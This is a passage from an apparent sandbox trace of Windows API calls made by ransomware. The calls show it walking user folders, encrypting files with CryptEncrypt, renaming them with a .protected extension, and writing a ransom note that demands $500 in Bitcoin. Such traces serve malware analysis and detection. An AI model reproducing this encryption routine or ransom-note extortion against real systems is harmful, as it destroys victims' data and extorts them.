lpString2="Program Files (x86)") returned -1 [0095.228] lstrcmpiW (lpString1="MSNBC News.url", lpString2="$Recycle.bin") returned 1 [0095.228] lstrcmpiW (lpString1="MSNBC News.url", lpString2="System Volume Information") returned -1 [0095.228] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0095.228] StrStrIW (lpFirst="MSNBC News.url", lpSrch=".protected") returned 0x0 [0095.228] lstrcmpW (lpString1="MSNBC News.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.228] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.228] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.228] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0095.228] StrStrW (lpFirst="MSNBC News.url", lpSrch=".txt") returned 0x0 [0095.228] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0095.228] StrStrW (lpFirst="MSNBC News.url", lpSrch=".rar") returned 0x0 [0095.228] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0095.228] StrStrW (lpFirst="MSNBC News.url", lpSrch=".zip") returned 0x0 [0095.229] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.229] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.229] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.230] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.230] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.230] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.230] CloseHandle (hObject=0xd4) returned 1 [0095.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.protected") returned 68 [0095.231] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.protected")) returned 1 [0095.232] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.232] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.232] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\RESTORE_FILES.txt") returned 61 [0095.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.235] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.235] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.236] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.236] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.236] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.236] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0095.236] CloseHandle (hObject=0xb4) returned 1 [0095.237] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.237] lstrcmpiW (lpString1="Windows Live", lpString2="Windows") returned 1 [0095.237] lstrcmpiW (lpString1="Windows Live", lpString2="Program Files") returned 1 [0095.237] lstrcmpiW (lpString1="Windows Live", lpString2="Program Files (x86)") returned 1 [0095.237] lstrcmpiW (lpString1="Windows Live", lpString2="$Recycle.bin") returned 1 [0095.237] lstrcmpiW (lpString1="Windows Live", lpString2="System Volume Information") returned 1 [0095.237] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live") returned 43 [0095.237] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0095.237] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0095.237] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*") returned 45 [0095.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.247] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.247] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.247] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.247] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.247] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.247] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\.") returned 45 [0095.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.247] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.247] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.247] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.247] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.247] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.247] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.247] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\..") returned 46 [0095.248] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.248] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.248] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.248] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Windows") returned -1 [0095.248] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Program Files") returned -1 [0095.248] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Program Files (x86)") returned -1 [0095.248] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="$Recycle.bin") returned 1 [0095.248] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="System Volume Information") returned -1 [0095.248] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0095.248] StrStrIW (lpFirst="Get Windows Live.url", lpSrch=".protected") returned 0x0 [0095.248] lstrcmpW (lpString1="Get Windows Live.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.249] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0095.249] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".txt") returned 0x0 [0095.249] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0095.249] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".rar") returned 0x0 [0095.249] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0095.249] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".zip") returned 0x0 [0095.249] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.250] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.250] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.250] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.250] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.250] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.250] CloseHandle (hObject=0xd4) returned 1 [0095.251] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.protected") returned 74 [0095.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.protected" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.protected")) returned 1 [0095.252] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.252] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Windows") returned 1 [0095.252] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Program Files") returned 1 [0095.252] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Program Files (x86)") returned 1 [0095.252] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="$Recycle.bin") returned 1 [0095.252] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="System Volume Information") returned 1 [0095.252] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0095.252] StrStrIW (lpFirst="Windows Live Gallery.url", lpSrch=".protected") returned 0x0 [0095.252] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="RESTORE_FILES.txt") returned 1 [0095.252] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.252] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.252] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0095.252] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".txt") returned 0x0 [0095.252] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0095.252] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".rar") returned 0x0 [0095.252] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0095.252] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".zip") returned 0x0 [0095.252] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.253] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.253] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.254] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.254] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.254] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.254] CloseHandle (hObject=0xd4) returned 1 [0095.255] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.protected") returned 78 [0095.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.protected" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.protected")) returned 1 [0095.256] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.256] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Windows") returned 1 [0095.256] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Program Files") returned 1 [0095.256] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Program Files (x86)") returned 1 [0095.256] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="$Recycle.bin") returned 1 [0095.256] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="System Volume Information") returned 1 [0095.256] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0095.256] StrStrIW (lpFirst="Windows Live Mail.url", lpSrch=".protected") returned 0x0 [0095.256] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="RESTORE_FILES.txt") returned 1 [0095.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.256] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0095.257] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".txt") returned 0x0 [0095.257] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0095.257] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".rar") returned 0x0 [0095.257] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0095.257] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".zip") returned 0x0 [0095.257] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.258] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.258] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.258] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.258] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.259] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.259] CloseHandle (hObject=0xd4) returned 1 [0095.259] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.protected") returned 75 [0095.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.protected" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.protected")) returned 1 [0095.260] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.260] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Windows") returned 1 [0095.260] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Program Files") returned 1 [0095.260] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Program Files (x86)") returned 1 [0095.260] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="$Recycle.bin") returned 1 [0095.260] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="System Volume Information") returned 1 [0095.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0095.260] StrStrIW (lpFirst="Windows Live Spaces.url", lpSrch=".protected") returned 0x0 [0095.260] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="RESTORE_FILES.txt") returned 1 [0095.260] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.260] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.261] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0095.261] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".txt") returned 0x0 [0095.261] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0095.261] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".rar") returned 0x0 [0095.261] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0095.261] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".zip") returned 0x0 [0095.261] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.262] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.262] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.263] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.263] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.263] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.263] CloseHandle (hObject=0xd4) returned 1 [0095.264] wnsprintfW (in: 